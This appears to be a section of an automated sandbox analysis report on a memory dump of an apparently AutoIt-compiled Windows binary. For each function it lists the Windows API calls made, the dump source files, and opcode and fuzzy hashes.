                                                                                                                                                                      Function 003E73B1, Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,003E5134,?,?,00000000,00000001), ref: 003E73BF
                                                                                                                                                                        • Part of subcall function 003E3C94: GetWindowRect.USER32 ref: 003E3CA7
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E73E9
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003E73F0
                                                                                                                                                                      • mouse_event.USER32 ref: 003E7422
                                                                                                                                                                        • Part of subcall function 003D54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003D555E
                                                                                                                                                                      • GetCursorPos.USER32(?,?,?,?,?,?,003E5134,?,?,00000000,00000001), ref: 003E744E
                                                                                                                                                                      • mouse_event.USER32 ref: 003E74AC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4137160315-0
                                                                                                                                                                      • Opcode ID: 72ffe4680b3d721a655f9a131162ebb744e5ff8c2b035d88321f0c9d0c0bba6b
                                                                                                                                                                      • Instruction ID: 2678de17ba4393afee90542b4a3f33fc3465a21e374043a42eb7d141f1ce34d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 72ffe4680b3d721a655f9a131162ebb744e5ff8c2b035d88321f0c9d0c0bba6b
                                                                                                                                                                      • Instruction Fuzzy Hash: FE31D472508355AFD721DF15D849F9BBBA9FF88314F000A1AF988971D1DB30E908CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8D5B, Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003C85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003C8608
                                                                                                                                                                        • Part of subcall function 003C85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003C8612
                                                                                                                                                                        • Part of subcall function 003C85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003C8621
                                                                                                                                                                        • Part of subcall function 003C85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003C8628
                                                                                                                                                                        • Part of subcall function 003C85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003C863E
                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,003C8977), ref: 003C8DAC
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003C8DB8
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 003C8DBF
                                                                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 003C8DD8
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,003C8977), ref: 003C8DEC
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 003C8DF3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3008561057-0
                                                                                                                                                                      • Opcode ID: 3de2fa8427d5c399be4356b20dcbe440376e3ded0b8f7c22cb9d41112280055e
                                                                                                                                                                      • Instruction ID: 96f35c510436e21be2d264aebf3c2be3b69df4676fa585bacaa5604403d76644
                                                                                                                                                                      • Opcode Fuzzy Hash: 3de2fa8427d5c399be4356b20dcbe440376e3ded0b8f7c22cb9d41112280055e
                                                                                                                                                                      • Instruction Fuzzy Hash: 27118672600605EFDB129BA4CC49FBA7BA9EF55316F10402DE846D7250CB32AE40CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8AF9, Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003C8B2A
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003C8B31
                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003C8B40
                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 003C8B4B
                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003C8B7A
                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 003C8B8E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                      • Opcode ID: 4f6ff838c56a03076646c48b24454ebc633532e7788e5064dd27480d226c90ca
                                                                                                                                                                      • Instruction ID: 5a17c120325046d89558f7a33f31ae4195d8bb605845e593fb7e17d5144788ad
                                                                                                                                                                      • Opcode Fuzzy Hash: 4f6ff838c56a03076646c48b24454ebc633532e7788e5064dd27480d226c90ca
                                                                                                                                                                      • Instruction Fuzzy Hash: 44112CB250120AAFDF029FA4DD49FEA7BADEF08344F054069FE05A2160C7769E65DB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC19A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0037134D
                                                                                                                                                                        • Part of subcall function 003712F3: SelectObject.GDI32(?,00000000), ref: 0037135C
                                                                                                                                                                        • Part of subcall function 003712F3: BeginPath.GDI32(?), ref: 00371373
                                                                                                                                                                        • Part of subcall function 003712F3: SelectObject.GDI32(?,00000000), ref: 0037139C
                                                                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003FC1C4
                                                                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 003FC1D8
                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003FC1E6
                                                                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 003FC1F6
                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 003FC206
                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 003FC216
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                      • Opcode ID: f9b8192e4602453d9bec612a38d6783b25c002f0a795654515af9bec12278033
                                                                                                                                                                      • Instruction ID: 8f941ed97e0a64cf998a541b762d6213206c5fda0432f907eb0a831fdbc69487
                                                                                                                                                                      • Opcode Fuzzy Hash: f9b8192e4602453d9bec612a38d6783b25c002f0a795654515af9bec12278033
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F11177640010DBFEF129F95DC88EAA7FADEF08394F048421FE188A1A1C7719E55DBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CBC53, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 003CBC78
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 003CBC89
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003CBC90
                                                                                                                                                                      • ReleaseDC.USER32 ref: 003CBC98
                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003CBCAF
                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 003CBCC1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1035833867-0
                                                                                                                                                                      • Opcode ID: 0e243b2ac468d9a7d92bbb4b541f23fc9bb51ac9a09bbc6811ee2e8e41ebb37d
                                                                                                                                                                      • Instruction ID: 1f64c3da3c7ef8f2b8e4225f40a791c85de843fd1bd5206f48aa3733b0878031
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e243b2ac468d9a7d92bbb4b541f23fc9bb51ac9a09bbc6811ee2e8e41ebb37d
                                                                                                                                                                      • Instruction Fuzzy Hash: D3012175A00619BBEF119BA59D49F5EBFACEF48751F004069FE04E7291DA709C10CF90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003903A2, Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003903D3
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 003903DB
                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003903E6
                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003903F1
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 003903F9
                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00390401
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                      • Opcode ID: 90132e245ad022c376c133e2eb53baacf1febd08d78e2b941a9a7421afaa2485
                                                                                                                                                                      • Instruction ID: e7fec2f0a080ce5764425132d0d866abb0520d6c9127124140365390cc5243af
                                                                                                                                                                      • Opcode Fuzzy Hash: 90132e245ad022c376c133e2eb53baacf1febd08d78e2b941a9a7421afaa2485
                                                                                                                                                                      • Instruction Fuzzy Hash: CF016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D568B, Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003D569B
                                                                                                                                                                      • SendMessageTimeoutW.USER32 ref: 003D56B1
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 003D56C0
                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003D56CF
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003D56D9
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003D56E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                      • Opcode ID: 6a619887decae4d3f3532c51df76fe60eca19b8cb69bc0c74db5517e61e2e21a
                                                                                                                                                                      • Instruction ID: f651cbc84d656830663a8ecc2fce69150dbbe06d30ca4c47dd5bbeef96c552dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 6a619887decae4d3f3532c51df76fe60eca19b8cb69bc0c74db5517e61e2e21a
                                                                                                                                                                      • Instruction Fuzzy Hash: A2F01D32241159BFE7225BA2AC0EEFB7A7CEFC6B15F000169FE04D1150DAA15A01C6B5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8E74, Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003C8E7F
                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 003C8E8B
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003C8E94
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003C8E9C
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 003C8EA5
                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 003C8EAC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                      • Opcode ID: 348218e5b49303f8cd06764b1b57de4e7721d7482595a7b00e262214bc03af4e
                                                                                                                                                                      • Instruction ID: c6874d27354cdf1a825bc3e7d2a61258a3125322d3f95630f8ca10371c732f5b
                                                                                                                                                                      • Opcode Fuzzy Hash: 348218e5b49303f8cd06764b1b57de4e7721d7482595a7b00e262214bc03af4e
                                                                                                                                                                      • Instruction Fuzzy Hash: 57E05277104506FFDA022FE6EC0C96ABF6DFF89762B548631FA1981470CB329461DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C7A78, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00402C7C,?), ref: 003C7C32
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00402C7C,?), ref: 003C7C4A
                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,003FFB80,000000FF,?,00000000,00000800,00000000,?,00402C7C,?), ref: 003C7C6F
                                                                                                                                                                      • _memcmp.LIBCMT ref: 003C7C90
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                      • String ID: ,,@
                                                                                                                                                                      • API String ID: 314563124-2180730024
                                                                                                                                                                      • Opcode ID: cfc652f68a6c01a404cb1bdaa6e5d2df83681a27683e6b2f77cc665adff87f75
                                                                                                                                                                      • Instruction ID: 113272dbf510b96344a3c67419e1aab5dba5eccf7ea5d9e9935be126c2c8500e
                                                                                                                                                                      • Opcode Fuzzy Hash: cfc652f68a6c01a404cb1bdaa6e5d2df83681a27683e6b2f77cc665adff87f75
                                                                                                                                                                      • Instruction Fuzzy Hash: E881F975A00109EFCB05DF94C984EEEB7B9FF89315F208198E915EB250DB71AE06CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003E8902, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003E8928
                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 003E8A37
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003E8BAF
                                                                                                                                                                        • Part of subcall function 003D7804: VariantInit.OLEAUT32(00000000), ref: 003D7844
                                                                                                                                                                        • Part of subcall function 003D7804: VariantCopy.OLEAUT32(00000000,?), ref: 003D784D
                                                                                                                                                                        • Part of subcall function 003D7804: VariantClear.OLEAUT32(00000000), ref: 003D7859
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                      • Opcode ID: 79274163f04f27e9306b571cdef0934e36fc3b29e4b16ec3cb4dc3ea782f376f
                                                                                                                                                                      • Instruction ID: 15dffe16c81371ddbd22f5d1558ef003c62f5bf70a207a4635a339e1762ad2b5
                                                                                                                                                                      • Opcode Fuzzy Hash: 79274163f04f27e9306b571cdef0934e36fc3b29e4b16ec3cb4dc3ea782f376f
                                                                                                                                                                      • Instruction Fuzzy Hash: 93918271A08341DFC711DF25C48596BBBE4EF89714F048A6EF89A8B3A1DB31E905CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2F86, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0038FEC6: _wcscpy.LIBCMT ref: 0038FEE9
                                                                                                                                                                      • _memset.LIBCMT ref: 003D3077
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003D30A6
                                                                                                                                                                      • SetMenuItemInfoW.USER32 ref: 003D3159
                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003D3187
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                                                                      • Opcode ID: 9ef63d448f98d814c9d1c3d9180d7c7edef3e39a0d246c69d124ab2250b11e1a
                                                                                                                                                                      • Instruction ID: da30f12571303091a20a832ad37908689da18f39657c1d23d587bcc8e177e171
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ef63d448f98d814c9d1c3d9180d7c7edef3e39a0d246c69d124ab2250b11e1a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E51B2725083029AD727AF24E84566B77E8AF45350F054A2FF896D6390DB74CE448753
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D2C42, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003D2CAF
                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003D2CCB
                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 003D2D11
                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00436890,00000000), ref: 003D2D5A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                      • Opcode ID: 2d7669ad379e1c0e6acdc8079b82e2399eff15e5987633a672868dc5475a1c4a
                                                                                                                                                                      • Instruction ID: fd934ad7018945963cea6ecccc12d6689d9d19f499b02f20dc18b23cd10b0c6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d7669ad379e1c0e6acdc8079b82e2399eff15e5987633a672868dc5475a1c4a
                                                                                                                                                                      • Instruction Fuzzy Hash: BD419F322043019FD722DF24E844B1BBBE9AF95320F15465EF9659B3A1D770E905CB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EDAB9, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003EDAD9
                                                                                                                                                                        • Part of subcall function 003779AB: _memmove.LIBCMT ref: 003779F9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharLower_memmove
                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                      • API String ID: 3425801089-567219261
                                                                                                                                                                      • Opcode ID: 154f82ab16da69b8b06d9aaa3adeba9d414edc074d614168319d3f44c3da9de7
                                                                                                                                                                      • Instruction ID: c9c793f598fb9ed6a117cab49e78a12215bf22e2762c0ddb602139b5976cd627
                                                                                                                                                                      • Opcode Fuzzy Hash: 154f82ab16da69b8b06d9aaa3adeba9d414edc074d614168319d3f44c3da9de7
